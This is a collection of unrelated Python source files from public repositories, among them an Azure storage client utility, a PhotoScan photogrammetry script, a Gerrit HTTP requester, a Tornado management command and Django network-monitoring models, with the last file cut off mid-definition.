response_headers[key.lower()] = name wrap = HTTPResponse(status, response.reason, response_headers, response.raw.read()) response.close() return wrap logger = getLogger(__name__) """ Azure Location: Azure container name + path """ AzureLocation = namedtuple( "AzureLocation", [ "container_name", # Azure container name "path" # Azure path name ]) class SnowflakeAzureUtil(object): """Azure Utility class.""" # max_connections works over this size DATA_SIZE_THRESHOLD = 67108864 @staticmethod def create_client(stage_info, use_accelerate_endpoint: bool = False): """Creates a client object with a stage credential. Args: stage_info: Information about the stage. use_accelerate_endpoint: Not used for Azure client. Returns: The client to communicate with GCS. """ stage_credentials = stage_info['creds'] sas_token = stage_credentials['AZURE_SAS_TOKEN'] if sas_token and sas_token.startswith('?'): sas_token = sas_token[1:] end_point = stage_info['endPoint'] if end_point.startswith('blob.'): end_point = end_point[len('blob.'):] if use_new_azure_api: client = BlobServiceClient( account_url="https://{}.blob.{}".format( stage_info['storageAccount'], end_point ), credential=sas_token) client._config.retry_policy = ExponentialRetry( initial_backoff=1, increment_base=2, max_attempts=60, random_jitter_range=2 ) else: client = BlockBlobService(account_name=stage_info['storageAccount'], sas_token=sas_token, endpoint_suffix=end_point) client._httpclient = RawBodyReadingClient(session=requests.session(), protocol="https", timeout=2000) client.retry = ExponentialRetry( initial_backoff=1, increment_base=2, max_attempts=60, random_jitter_range=2).retry return client @staticmethod def extract_container_name_and_path(stage_location): stage_location = os.path.expanduser(stage_location) container_name = stage_location path = '' # split stage location as bucket name and path if '/' in stage_location: container_name = stage_location[0:stage_location.index('/')] path = stage_location[stage_location.index('/') + 1:] if path and not path.endswith('/'): path += '/' return AzureLocation( container_name=container_name, path=path) @staticmethod def get_file_header(meta, filename): """Gets Azure file properties.""" client = meta['client'] azure_logger = None backup_logging_level = None if not use_new_azure_api: azure_logger = logging.getLogger('azure.storage.common.storageclient') backup_logging_level = azure_logger.level # Critical (50) is the highest level, so we need to set it to something higher to silence logging message azure_logger.setLevel(60) azure_location = SnowflakeAzureUtil.extract_container_name_and_path( meta['stage_info']['location']) if use_new_azure_api: try: # HTTP HEAD request blob = client.get_blob_client(azure_location.container_name, azure_location.path + filename) blob_details = blob.get_blob_properties() except ResourceNotFoundError: meta['result_status'] = ResultStatus.NOT_FOUND_FILE return FileHeader( digest=None, content_length=None, encryption_metadata=None ) except HttpResponseError as err: logger.debug("Caught exception's status code: {status_code} and message: {ex_representation}".format( status_code=err.status_code, ex_representation=str(err) )) if err.status_code == 403 and SnowflakeAzureUtil._detect_azure_token_expire_error(err): logger.debug("AZURE Token expired. Renew and retry") meta['result_status'] = ResultStatus.RENEW_TOKEN else: logger.debug('Unexpected Azure error: %s' 'container: %s, path: %s', err, azure_location.container_name, azure_location.path) meta['result_status'] = ResultStatus.ERROR return else: try: # HTTP HEAD request blob = client.get_blob_properties(azure_location.container_name, azure_location.path + filename) except AzureMissingResourceHttpError: meta['result_status'] = ResultStatus.NOT_FOUND_FILE return FileHeader( digest=None, content_length=None, encryption_metadata=None ) except AzureHttpError as err: logger.debug("Caught exception's status code: {status_code} and message: {ex_representation}".format( status_code=err.status_code, ex_representation=str(err) )) if err.status_code == 403 and SnowflakeAzureUtil._detect_azure_token_expire_error(err): logger.debug("AZURE Token expired. Renew and retry") meta['result_status'] = ResultStatus.RENEW_TOKEN else: logger.debug('Unexpected Azure error: %s' 'container: %s, path: %s', err, azure_location.container_name, azure_location.path) meta['result_status'] = ResultStatus.ERROR return finally: azure_logger.setLevel(backup_logging_level) meta['result_status'] = ResultStatus.UPLOADED if use_new_azure_api: encryptiondata = json.loads(blob_details.metadata.get('encryptiondata', 'null')) encryption_metadata = EncryptionMetadata( key=encryptiondata['WrappedContentKey']['EncryptedKey'], iv=encryptiondata['ContentEncryptionIV'], matdesc=blob_details.metadata['matdesc'], ) if encryptiondata else None return FileHeader( digest=blob_details.metadata.get('sfcdigest'), content_length=blob_details.size, encryption_metadata=encryption_metadata ) else: encryptiondata = json.loads(blob.metadata.get('encryptiondata', 'null')) encryption_metadata = EncryptionMetadata( key=encryptiondata['WrappedContentKey']['EncryptedKey'], iv=encryptiondata['ContentEncryptionIV'], matdesc=blob.metadata['matdesc'], ) if encryptiondata else None return FileHeader( digest=blob.metadata.get('sfcdigest'), content_length=blob.properties.content_length, encryption_metadata=encryption_metadata ) @staticmethod def _detect_azure_token_expire_error(err): if err.status_code != 403: return False errstr = str(err) return "Signature not valid in the specified time frame" in errstr or \ "Server failed to authenticate the request." in errstr @staticmethod def upload_file(data_file, meta, encryption_metadata, max_concurrency): azure_metadata = { 'sfcdigest': meta[SHA256_DIGEST], } if (encryption_metadata): azure_metadata.update({ 'encryptiondata': json.dumps({ 'EncryptionMode': 'FullBlob', 'WrappedContentKey': { 'KeyId': '<KEY>', 'EncryptedKey': encryption_metadata.key, 'Algorithm': 'AES_CBC_256' }, 'EncryptionAgent': { 'Protocol': '1.0', 'EncryptionAlgorithm': 'AES_CBC_128', }, 'ContentEncryptionIV': encryption_metadata.iv, 'KeyWrappingMetadata': { 'EncryptionLibrary': 'Java 5.3.0' } }), 'matdesc': encryption_metadata.matdesc }) azure_location = SnowflakeAzureUtil.extract_container_name_and_path( meta['stage_info']['location']) path = azure_location.path + meta['dst_file_name'].lstrip('/') client = meta['client'] callback = None if meta['put_azure_callback']: callback = meta['put_azure_callback']( data_file, os.path.getsize(data_file), output_stream=meta['put_callback_output_stream'], show_progress_bar=meta['show_progress_bar']) if use_new_azure_api: def azure_callback(response): current = response.context['upload_stream_current'] total = response.context['data_stream_total'] if current is not None: callback(current) logger.debug("data transfer progress from sdk callback. " "current: %s, total: %s", current, total) try: blob = client.get_blob_client( azure_location.container_name, path ) with open(data_file, 'rb') as upload_f: blob.upload_blob( upload_f, metadata=azure_metadata, overwrite=True, max_concurrency=max_concurrency, raw_response_hook=azure_callback if meta['put_azure_callback'] else None, content_settings=ContentSettings( content_type=HTTP_HEADER_VALUE_OCTET_STREAM, content_encoding='utf-8', ) ) except HttpResponseError as err: logger.debug("Caught exception's status code: {status_code} and message: {ex_representation}".format( status_code=err.status_code, ex_representation=str(err) )) if err.status_code == 403 and SnowflakeAzureUtil._detect_azure_token_expire_error(err): logger.debug("AZURE Token expired. Renew and retry") meta['result_status'] = ResultStatus.RENEW_TOKEN else: meta['last_error'] = err meta['result_status'] = ResultStatus.NEED_RETRY return else: def azure_callback(current, total): callback(current) logger.debug("data transfer progress from sdk callback. " "current: %s, total: %s", current, total) try: client.create_blob_from_path( azure_location.container_name, path, data_file, progress_callback=azure_callback if meta['put_azure_callback'] else None, metadata=azure_metadata, max_connections=max_concurrency, content_settings=ContentSettings( content_type=HTTP_HEADER_VALUE_OCTET_STREAM, content_encoding='utf-8' ) ) except AzureHttpError as err: logger.debug("Caught exception's status code: {status_code} and message: {ex_representation}".format( status_code=err.status_code, ex_representation=str(err) )) if err.status_code == 403 and SnowflakeAzureUtil._detect_azure_token_expire_error(err): logger.debug("AZURE Token expired. Renew and retry") meta['result_status'] = ResultStatus.RENEW_TOKEN else: meta['last_error'] = err meta['result_status'] = ResultStatus.NEED_RETRY return logger.debug('DONE putting a file') meta['dst_file_size'] = meta['upload_size'] meta['result_status'] = ResultStatus.UPLOADED # Comparing with s3, azure haven't experienced OpenSSL.SSL.SysCallError, # so we will add logic to catch it only when it happens @staticmethod def _native_download_file(meta, full_dst_file_name, max_concurrency): azure_location = SnowflakeAzureUtil.extract_container_name_and_path( meta['stage_info']['location']) path = azure_location.path + meta['src_file_name'].lstrip('/') client = meta['client'] callback = None if meta['get_azure_callback']: callback = meta['get_azure_callback']( meta['src_file_name'], meta['src_file_size'], output_stream=meta['get_callback_output_stream'], show_progress_bar=meta['show_progress_bar']) if use_new_azure_api: def azure_callback(response): current = response.context['download_stream_current'] total = response.context['data_stream_total'] if current is not None: callback(current) logger.debug("data transfer progress from sdk callback. " "current: %s, total: %s", current, total) try: blob = client.get_blob_client( azure_location.container_name, path ) with open(full_dst_file_name, 'wb') as download_f: download = blob.download_blob( max_concurrency=max_concurrency, raw_response_hook=azure_callback if meta['put_azure_callback'] else None, ) download.readinto(download_f) except HttpResponseError as err: logger.debug("Caught exception's status code: {status_code} and message: {ex_representation}".format( status_code=err.status_code, ex_representation=str(err) )) if err.status_code == 403 and SnowflakeAzureUtil._detect_azure_token_expire_error(err): logger.debug("AZURE Token expired. Renew and retry") meta['result_status'] = ResultStatus.RENEW_TOKEN else: meta['last_error'] = err meta['result_status'] = ResultStatus.NEED_RETRY return else: def azure_callback(current, total): callback(current) logger.debug("data transfer progress from sdk callback. " "current: %s, total: %s", current, total) try: client.get_blob_to_path( azure_location.container_name, path, full_dst_file_name, progress_callback=azure_callback if meta['get_azure_callback'] else None, max_connections=max_concurrency ) except AzureHttpError as err: logger.debug("Caught exception's status code: {status_code} and message: {ex_representation}".format( status_code=err.status_code, ex_representation=str(err) )) if err.status_code == 403 and SnowflakeAzureUtil._detect_azure_token_expire_error(err): logger.debug("AZURE Token expired. Renew and retry") meta['result_status'] = ResultStatus.RENEW_TOKEN else: meta['last_error'] = err meta['result_status'] = ResultStatus.NEED_RETRY return meta['result_status'] = ResultStatus.DOWNLOADED
StarcoderdataPython
1786110
<gh_stars>100-1000 # *************************************************************************************** # Title: LabAdvComp/parcel # Author: <NAME> # Date: May 26, 2016 # Code version: 0.1.13 # Availability: https://github.com/LabAdvComp/parcel # *************************************************************************************** import platform from termcolor import colored as _colored OS_WINDOWS = False OS_LINUX = False OS_OSX = False # Are we running on windows? if platform.system() == "Windows": OS_WINDOWS = True elif platform.system() == "Darwin": OS_OSX = True elif platform.system() == "Linux": OS_LINUX = True # Are we running on windows? if OS_WINDOWS: from threading import Thread as Process else: # Assume a posix system from multiprocessing import Process def colored(text, color): if OS_WINDOWS: return text else: return _colored(text, color)
StarcoderdataPython
156107
<gh_stars>0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Creation date: 13 February 2020 Last modified: 11 December 2020 Author: <NAME>; <EMAIL> Affiliation: Helmholtz Zentrum Geesthacht Collaborators: <NAME> - Aarhus University Description: This python script is written for Agisoft PhotoScan Professional v1.4.4 Linux Ubuntu computer with 128 GB RAM and a Quadro P1000 CUDA graphics card with 5 compute nodes @1480 MHz, 4006 MB Note: PhotoScan has been replaced by MetaShape Carlson_Iceberg_PhotoScan_GS_DC_distv1.py performs gradual selection and buils the dense point cloud. During the gradual selection process, thresholds for the reconstruction uncertainty, projection accuracy, and reprojection error are used to identify and remove inaccurate points in the sparse point cloud. This script duplicates the chunk when removing points during each step so the effects of each metric on the sparse point cloud can be evaluated. The user provides an initial threshold, which is adjusted through an iterative process that removes as many inaccurate points as possible, while still retaining a sufficient number to compute the dense point cloud. The mesh model can also be computed at this point, if desired. This script was developed using the Agisoft python documentation, forums and from a script by Yu-Hsuan Tu https://github.com/dobedobedo/PhotoScan-Workflow/blob/master/PhotoScan_Workflow.py For more on Agisoft PhotoScan workflow- see Mayer et al. (2018) A comprehensive workflow to process UAV images for efficient production of accurate Geo-information. IX National Conference on Cartography and Geodesy, Lisbon Portugal. https://www.researchgate.net/profile/Thomas_Kersten/publication/328841797_A_Comprehensive_Workflow_to_Process_UAV_Images_for_the_Efficient_Production_of_Accurate_Geo-information/links/5be5f929a6fdcc3a8dcb181a/A-Comprehensive-Workflow-to-Process-UAV-Images-for-the-Efficient-Production-of-Accurate-Geo-information.pdf """ import PhotoScan, time import os.path from datetime import datetime # user specified parameters # # reconstruction uncertainty threshold ru_init_threshold = 15 # Dense cloud quality DenseQual = PhotoScan.HighQuality # Depth filter mode DepthFilterMode = PhotoScan.AggressiveFiltering # Model # Surface type SurfType = PhotoScan.SurfaceType.Arbitrary # Interpolation ModInterp = PhotoScan.Interpolation.EnabledInterpolation # FaceCount ModFaceCount = PhotoScan.FaceCount.HighFaceCount # Model source data ModSource = PhotoScan.DataSource.DepthMapsData def ReduceError_RE(chunk, init_threshold = 0.5): # This is used to reduce error based on reprojection error #init_threshold = re_init_threshold tie_points = chunk.point_cloud fltr = PhotoScan.PointCloud.Filter() fltr.init(chunk, PhotoScan.PointCloud.Filter.ReprojectionError) threshold = init_threshold while fltr.max_value > init_threshold : fltr.selectPoints(threshold) nselected = len([p for p in tie_points.points if p.selected]) if nselected >= len(tie_points.points) / 10: fltr.resetSelection() threshold += 0.01 continue tie_points.removeSelectedPoints() chunk.optimizeCameras(fit_f=True, fit_cx=True, fit_cy=True, fit_b1=True, fit_b2=True, fit_k1=True, fit_k2=True, fit_k3=True, fit_k4=True, fit_p1=True, fit_p2=True, fit_p3=True, fit_p4=True, adaptive_fitting=False) fltr.init(chunk, PhotoScan.PointCloud.Filter.ReprojectionError) threshold = init_threshold def ReduceError_RU(chunk, ru_init_threshold): # This is used to reduce error based on reconstruction uncertainty init_threshold = ru_init_threshold tie_points = chunk.point_cloud fltr = PhotoScan.PointCloud.Filter() fltr.init(chunk, PhotoScan.PointCloud.Filter.ReconstructionUncertainty) threshold = init_threshold while fltr.max_value > ru_init_threshold: fltr.selectPoints(threshold) nselected = len([p for p in tie_points.points if p.selected]) if nselected >= len(tie_points.points) / 2 and threshold <= 50: fltr.resetSelection() threshold += 1 continue tie_points.removeSelectedPoints() chunk.optimizeCameras(fit_f=True, fit_cx=True, fit_cy=True, fit_b1=False, fit_b2=False, fit_k1=True, fit_k2=True, fit_k3=True, fit_k4=False, fit_p1=True, fit_p2=True, fit_p3=False, fit_p4=False, adaptive_fitting=False) fltr.init(chunk, PhotoScan.PointCloud.Filter.ReconstructionUncertainty) threshold = init_threshold def ReduceError_PA(chunk, init_threshold=10.0): # This is used to reduce error based on projection accuracy tie_points = chunk.point_cloud fltr = PhotoScan.PointCloud.Filter() fltr.init(chunk, PhotoScan.PointCloud.Filter.ProjectionAccuracy) threshold = init_threshold while fltr.max_value > 10.0: fltr.selectPoints(threshold) nselected = len([p for p in tie_points.points if p.selected]) if nselected >= len(tie_points.points) / 2 and threshold <= 12.0: fltr.resetSelection() threshold += 0.1 continue tie_points.removeSelectedPoints() chunk.optimizeCameras(fit_f=True, fit_cx=True, fit_cy=True, fit_b1=False, fit_b2=False, fit_k1=True, fit_k2=True, fit_k3=True, fit_k4=False, fit_p1=True, fit_p2=True, fit_p3=False, fit_p4=False, adaptive_fitting=False) fltr.init(chunk, PhotoScan.PointCloud.Filter.ProjectionAccuracy) threshold = init_threshold # This is to tighten tie point accuracy value chunk.tiepoint_accuracy = 0.1 chunk.optimizeCameras(fit_f=True, fit_cx=True, fit_cy=True, fit_b1=True, fit_b2=True, fit_k1=True, fit_k2=True, fit_k3=True, fit_k4=True, fit_p1=True, fit_p2=True, fit_p3=True, fit_p4=True, adaptive_fitting=False) def BuildDenseCloud(chunk, Quality, FilterMode): chunk.buildDepthMaps(quality=Quality, filter=FilterMode, reuse_depth=False) chunk.buildDenseCloud(point_colors=True) def BuildModel(chunk,SurfType,ModInterp, ModFaceCount,ModSource): chunk.buildModel(surface=SurfType, interpolation=ModInterp, face_count=ModFaceCount, source=ModSource, vertex_colors=True) chunk.buildUV(mapping=PhotoScan.MappingMode.GenericMapping) chunk.buildTexture(blending=PhotoScan.MosaicBlending, size = 4096, fill_holes=True,ghosting_filter=True ) # EPSG:4326 Geodetic world coordinate system used by GPS/GNSS sat nav wgs_84 = PhotoScan.CoordinateSystem("EPSG::4326") # list of PhotoScan projects prj_dir = '/your/project/directory/' prj_list = ['your', 'list', 'of projects'] time2go = True tstart = datetime(2020,2,27,18,0,0) while not time2go: time.sleep(30) tdif = datetime.now() - tstart seconds = tdif.total_seconds() if seconds > 0: time2go = True # project loop for p in prj_list: fn = prj_dir + p if os.path.isfile(fn): doc = PhotoScan.app.document doc.open(fn) run1oc = doc.chunk # gradual selection - # reconstruction uncertainty - Mayer et al. (2018) suggest ru_init_threshold of 10, here we use 15 run1gsru = run1oc.copy() run1gsru.label = "run1-gs-ru" ReduceError_RU(run1gsru, ru_init_threshold) # projection accuracy - Mayer et al. (2018) suggest 2-4 for consumer grade cameras run1gspa = run1gsru.copy() run1gspa.label = "run1-gs-ru-pa" ReduceError_PA(run1gspa) # reprojection error - Mayer et al. (2018) suggest 0.3 to 0.5 run1gsre = run1gspa.copy() run1gsre.label = "run1-gs-ru-pa-re" ReduceError_RE(run1gsre) doc.save() # build dense cloud run1dc =run1gsre.copy() run1dc.label = "run1-dc" BuildDenseCloud(run1dc,DenseQual, DepthFilterMode) doc.save() # build mesh and texture #BuildModel(run1dc,SurfType,ModInterp, ModFaceCount,ModSource) #doc.save() else: print('invalid directory or file name')
StarcoderdataPython
1750451
<reponame>sstoefe/python-gerrit-api #!/usr/bin/env python # -*- coding:utf-8 -*- # @Author: <NAME> from requests import Session from requests.adapters import HTTPAdapter from gerrit.utils.exceptions import ( NotAllowedError, ValidationError, AuthError, UnauthorizedError, NotFoundError, ConflictError, ClientError, ServerError, ) class Requester(object): """ A class which carries out HTTP requests. You can replace this class with one of your own implementation if you require some other way to access Gerrit. This default class can handle simple authentication only. """ VALID_STATUS_CODES = [ 200, ] AUTH_COOKIE = None def __init__(self, **kwargs): """ :param kwargs: """ timeout = 10 self.username = kwargs.get("username") self.password = <PASSWORD>("password") self.ssl_verify = kwargs.get("ssl_verify") self.cert = kwargs.get("cert") self.timeout = kwargs.get("timeout", timeout) self.session = Session() self.max_retries = kwargs.get("max_retries") if self.max_retries is not None: retry_adapter = HTTPAdapter(max_retries=self.max_retries) self.session.mount("http://", retry_adapter) self.session.mount("https://", retry_adapter) def get_request_dict( self, params=None, data=None, json=None, headers=None, **kwargs ): """ :param params: :param data: :param json: :param headers: :param kwargs: :return: """ request_kwargs = kwargs if self.username and self.password: request_kwargs["auth"] = (self.username, self.password) if params: assert isinstance(params, dict), "Params must be a dict, got %s" % repr( params ) request_kwargs["params"] = params if headers: assert isinstance(headers, dict), "headers must be a dict, got %s" % repr( headers ) request_kwargs["headers"] = headers if self.AUTH_COOKIE: currentheaders = request_kwargs.get("headers", {}) currentheaders.update({"Cookie": self.AUTH_COOKIE}) request_kwargs["headers"] = currentheaders request_kwargs["verify"] = self.ssl_verify request_kwargs["cert"] = self.cert if data and json: raise ValueError("Cannot use data and json together") if data: request_kwargs["data"] = data if json: request_kwargs["json"] = json request_kwargs["timeout"] = self.timeout return request_kwargs def get( self, url, params=None, headers=None, allow_redirects=True, stream=False, **kwargs ): """ :param url: :param params: :param headers: :param allow_redirects: :param stream: :param kwargs: :return: """ request_kwargs = self.get_request_dict( params=params, headers=headers, allow_redirects=allow_redirects, stream=stream, **kwargs ) return self.confirm_status(self.session.get(url, **request_kwargs)) def post( self, url, params=None, data=None, json=None, files=None, headers=None, allow_redirects=True, **kwargs ): """ :param url: :param params: :param data: :param json: :param files: :param headers: :param allow_redirects: :param kwargs: :return: """ request_kwargs = self.get_request_dict( params=params, data=data, json=json, files=files, headers=headers, allow_redirects=allow_redirects, **kwargs ) return self.confirm_status(self.session.post(url, **request_kwargs)) def put( self, url, params=None, data=None, json=None, files=None, headers=None, allow_redirects=True, **kwargs ): """ :param url: :param params: :param data: :param json: :param files: :param headers: :param allow_redirects: :param kwargs: :return: """ request_kwargs = self.get_request_dict( params=params, data=data, json=json, files=files, headers=headers, allow_redirects=allow_redirects, **kwargs ) return self.confirm_status(self.session.put(url, **request_kwargs)) def delete(self, url, headers=None, allow_redirects=True, **kwargs): """ :param url: :param headers: :param allow_redirects: :param kwargs: :return: """ request_kwargs = self.get_request_dict( headers=headers, allow_redirects=allow_redirects, **kwargs ) return self.confirm_status(self.session.delete(url, **request_kwargs)) @staticmethod def confirm_status(res): """ check response status code :param res: :return: """ http_error_msg = "" if isinstance(res.reason, bytes): # We attempt to decode utf-8 first because some servers # choose to localize their reason strings. If the string # isn't utf-8, we fall back to iso-8859-1 for all other # encodings. (See PR #3538) try: reason = res.reason.decode("utf-8") except UnicodeDecodeError: reason = res.reason.decode("iso-8859-1") else: reason = res.reason if 400 <= res.status_code < 500: http_error_msg = u"%s Client Error: %s for url: %s" % ( res.status_code, reason, res.url, ) elif 500 <= res.status_code < 600: http_error_msg = u"%s Server Error: %s for url: %s" % ( res.status_code, reason, res.url, ) if res.status_code < 300: # OK, return http response return res elif res.status_code == 400: # Validation error raise ValidationError(http_error_msg) elif res.status_code == 401: # Unauthorized error raise UnauthorizedError(http_error_msg) elif res.status_code == 403: # Auth error raise AuthError(http_error_msg) elif res.status_code == 404: # Not Found raise NotFoundError(http_error_msg) elif res.status_code == 405: # Method Not Allowed raise NotAllowedError(http_error_msg) elif res.status_code == 409: # Conflict raise ConflictError(http_error_msg) elif res.status_code < 500: # Other 4xx, generic client error raise ClientError(http_error_msg) else: # 5xx is server error raise ServerError(http_error_msg)
StarcoderdataPython
4814030
from typing import Dict import attr @attr.s class NaiveBayesClassifierFreqs: """Naive Bayes classification table frequency values entry NaiveBayesClassifierFreqs contains the frequency values for whether a particular domain is found in viral, plasmid or chromosomal sequence.""" name: str = attr.ib() plasmid_freq: float = attr.ib() chrom_freq: float = attr.ib() viral_freq: float = attr.ib() plasmid_or_chrom_freq: float = attr.ib() @classmethod def from_line(cls, line): name, _, _, _, plasmid_freq, chrom_freq, viral_freq, plasmid_or_chrom_freq = line.strip().split('\t') return cls(name=name, plasmid_freq=float(plasmid_freq), chrom_freq=float(chrom_freq), viral_freq=float(viral_freq), plasmid_or_chrom_freq=float(plasmid_or_chrom_freq)) def parse_naive_bayes_classifier_table(path) -> Dict[str, NaiveBayesClassifierFreqs]: out = {} with open(path) as f: for line in f: freqs = NaiveBayesClassifierFreqs.from_line(line) out[freqs.name] = freqs return out
StarcoderdataPython
69473
<reponame>aleksandromelo/Exercicios cont = ('zero', 'um', 'dois', 'três', 'quatro', 'cinco', 'seis', 'sete', 'oito', 'nove', 'dez') n = int(input('Digite um número entre 0 e 10: ')) print(f'Você digitou o número {cont[n]}.')
StarcoderdataPython
1614296
<filename>projectenv/lib/python2.7/site-packages/gulp/__init__.py # -*- coding: utf-8 -*- from functools import wraps import logging import time as t __author__ = '<NAME>' __email__ = '<EMAIL>' __version__ = '0.1.0' def debug_log(lvl=logging.DEBUG, logger_name=None): def enable(f): logger = logging.getLogger(logger_name) @wraps(f) def wrapper(*args, **kwargs): init = logger.getEffectiveLevel() logger.setLevel(lvl) print('\n# function: {}'.format(f.__name__)) y = f(*args, **kwargs) logger.setLevel(init) return y return wrapper return enable def time_this(fmt, multiplier=1, **print_kwargs): def enable(f): @wraps(f) def wrapper(*args, **kwargs): start_t = t.time() y = f(*args, **kwargs) end_t = t.time() print('\n# function: {}'.format(f.__name__)) print(fmt.format(multiplier * (end_t-start_t)), **print_kwargs) return y return wrapper return enable def peek_vars(): def enable(f): @wraps(f) def wrapper(*args, **kwargs): y = f(*args, **kwargs) print('\n# function: {}'.format(f.__name__)) print('args: {}'.format(str(args))) print('kwargs: {}'.format(str(kwargs))) print('return: {}'.format(str(y))) return y return wrapper return enable
StarcoderdataPython
4823454
from logging import Logger from typing import Optional from pluggy import PluginManager from preacher.compilation.request import create_request_compiler from preacher.compilation.verification import create_description_compiler from preacher.compilation.verification import create_predicate_compiler from preacher.compilation.verification import create_response_description_compiler from .case import CaseCompiler from .scenario import ScenarioCompiler def create_scenario_compiler( plugin_manager: Optional[PluginManager] = None, logger: Optional[Logger] = None, ) -> ScenarioCompiler: request = create_request_compiler() predicate = create_predicate_compiler(plugin_manager=plugin_manager, logger=logger) description = create_description_compiler( predicate=predicate, plugin_manager=plugin_manager, logger=logger, ) response = create_response_description_compiler( predicate=predicate, description=description, logger=logger, ) case = CaseCompiler(request=request, response=response, description=description) return ScenarioCompiler(description=description, case=case)
StarcoderdataPython
1609821
##Create principal and thickened contours=name ##digitalterrainmodelraster=raster ##vzorec=stringif(("ELEV" % 25)=0,1,0) ##contourinterval=number5.0 ##contours=output vector outputs_GDALOGRCONTOUR_1=processing.runalg('gdalogr:contour', digitalterrainmodelraster,contourinterval,'ELEV',None,None) outputs_QGISFIELDCALCULATOR_2=processing.runalg('qgis:fieldcalculator', outputs_GDALOGRCONTOUR_1['OUTPUT_VECTOR'],'thick',1,1.0,0.0,True,vzorec,contours)
StarcoderdataPython
1752090
from ipywidgets import Output from IPython.display import display, HTML class AboutTab(object): def __init__(self): # self.tab = Output(layout={'height': '600px'}) self.tab = Output(layout={'height': 'auto'}) self.tab.append_display_data(HTML(filename='doc/about.html'))
StarcoderdataPython
3398135
<gh_stars>0 # Thanks to <NAME> for his file which show us # how to make Tornado runs fine with Django and other WSGI Handler. # => https://github.com/bdarnell/django-tornado-demo/blob/master/testsite/tornado_main.py import json import django.core.handlers.wsgi from django.apps import AppConfig from django.conf import settings from django.core.management import BaseCommand from tornado_websockets.tornadowrapper import TornadoWrapper if django.VERSION[1] > 5: django.setup() DEFAULT_PORT = 8000 def get_port(options, configuration): port = options.get('port') port = port or configuration.get('port') port = port or DEFAULT_PORT return port def run(tornado_handlers, tornado_settings, port): TornadoWrapper.start_app(tornado_handlers, tornado_settings) TornadoWrapper.listen(port) TornadoWrapper.loop() class Command(BaseCommand, AppConfig): help = 'Run Tornado web server with Django and WebSockets support' def __init__(self, *args, **kwargs): super(Command, self).__init__(*args, **kwargs) def add_arguments(self, parser): parser.add_argument('port', nargs='?', help='Optional port number', type=int) def handle(self, *args, **options): try: configuration = settings.TORNADO except AttributeError as e: self.stderr.write('runtornado: Configuration => Not found: %s.' % e) return port = get_port(options, configuration) tornado_handlers = configuration.get('handlers', []) tornado_settings = configuration.get('settings', {}) self.stdout.write('runtornado: Configuration => Found.') self.stdout.write('runtornado: Port => %d.' % port) self.stdout.write('runtornado: Handlers => Found %d initial handlers.' % len(tornado_handlers)) self.stdout.write('runtornado: Settings => ' + json.dumps(tornado_settings)) run(tornado_handlers, tornado_settings, port)
StarcoderdataPython
3219675
<gh_stars>1-10 """Provide API for transaction model scheme.""" import sqlalchemy from complainer.db import metadata transaction = sqlalchemy.Table( 'transactions', metadata, sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True), sqlalchemy.Column('quote_id', sqlalchemy.String(120), nullable=False), sqlalchemy.Column('transfer_id', sqlalchemy.Integer, nullable=False), sqlalchemy.Column( 'target_account_id', sqlalchemy.String(120), nullable=False ), sqlalchemy.Column('amount', sqlalchemy.Float, nullable=False), sqlalchemy.Column( 'complaint_id', sqlalchemy.ForeignKey('complaints.id'), nullable=False ), )
StarcoderdataPython
179412
#import sys, os #from importlib import import_module from fast_calc import rbp def run(a,b): return rbp(a, b) def fcn2( a ): a.id = a.id2 return a
StarcoderdataPython
1657065
<filename>setup.py from setuptools import setup setup( use_scm_version=True, setup_requires=["setuptools_scm"], entry_points={"console_scripts": ["rexpy = rexpy.__main__:cli"]} )
StarcoderdataPython
1777072
from django.db import models from django.utils.timezone import now import datetime from django.contrib.auth.models import Permission from django.contrib.contenttypes.models import ContentType from esmond.util import datetime_to_unixtime, remove_metachars, max_datetime, atencode class DeviceTag(models.Model): """A tag for a :py:class:`.Device.`""" name = models.CharField(max_length = 256, unique=True) class Meta: db_table = "devicetag" def __unicode__(self): return self.name class DeviceManager(models.Manager): def active(self): qs = super(DeviceManager, self).get_query_set() qs = qs.filter(active=True, end_time__gt=now()) return qs def active_as_dict(self): d = {} for dev in self.active(): d[dev.name] = dev return d class Device(models.Model): """A system which is pollable via SNMP. Referred to as a Managed Device in SNMP terminology. """ name = models.CharField(max_length = 256) begin_time = models.DateTimeField() end_time = models.DateTimeField(default=max_datetime) community = models.CharField(max_length = 128) active = models.BooleanField(default = True) devicetag = models.ManyToManyField(DeviceTag, through = "DeviceTagMap") oidsets = models.ManyToManyField("OIDSet", through = "DeviceOIDSetMap") objects = DeviceManager() class Meta: db_table = "device" ordering = ['name'] def __unicode__(self): return self.name def to_dict(self): return dict( begin_time=datetime_to_unixtime(self.begin_time), end_time=datetime_to_unixtime(self.end_time), name=self.name, active=self.active) class DeviceTagMap(models.Model): """Associates a set of :py:class:`.DeviceTag`s with a :py:class:`.Device`""" device = models.ForeignKey(Device, db_column="deviceid") device_tag = models.ForeignKey(DeviceTag, db_column="devicetagid") class Meta: db_table = "devicetagmap" class OIDType(models.Model): """Defines the type for an :py:class:`.OID`""" name = models.CharField(max_length=256) class Meta: db_table = "oidtype" ordering = ["name"] def __unicode__(self): return self.name class Poller(models.Model): """Defines a Poller that can be used to collect data.""" name = models.CharField(max_length=256) class Meta: db_table = "poller" ordering = ["name"] def __unicode__(self): return self.name class OID(models.Model): """An Object Identifier. This is a variable that can be measured via SNMP. """ name = models.CharField(max_length=256) aggregate = models.BooleanField(default = False) oid_type = models.ForeignKey(OIDType,db_column = "oidtypeid") endpoint_alias = models.CharField(max_length=256, null=True, blank=True, help_text="Optional endpoint alias (in, out, discard/out, etc)") class Meta: db_table = "oid" ordering = ["name"] def __unicode__(self): return self.name class OIDSet(models.Model): """A collection of :py:class:`.OID`s that are collected together.""" name = models.CharField(max_length=256, help_text="Name for OIDSet.") frequency = models.IntegerField(help_text="Polling frequency in seconds.") poller = models.ForeignKey(Poller,db_column="pollerid", help_text="Which poller to use for this OIDSet") poller_args = models.CharField(max_length=256, null=True, blank=True, help_text="Arguments for the Poller") oids = models.ManyToManyField(OID, through = "OIDSetMember", help_text="List of OIDs in the OIDSet") class Meta: db_table = "oidset" ordering = ["name"] def __unicode__(self): return self.name @property def aggregates(self): aggs = [] if self.poller_args: for i in self.poller_args.split(" "): k,v = i.split("=") if k == "aggregates": aggs = map(int, v.split(",")) break return aggs @property def ttl(self): ttl = None if self.poller_args: for i in self.poller_args.split(" "): k,v = i.split("=") if k == "ttl": ttl = int(v) break return ttl @property def frequency_ms(self): return self.frequency * 1000 @property def set_name(self): set_name = self.name if self.poller_args: for i in self.poller_args.split(" "): k, v = i.split("=") if k == "set_name": set_name = v break return set_name class 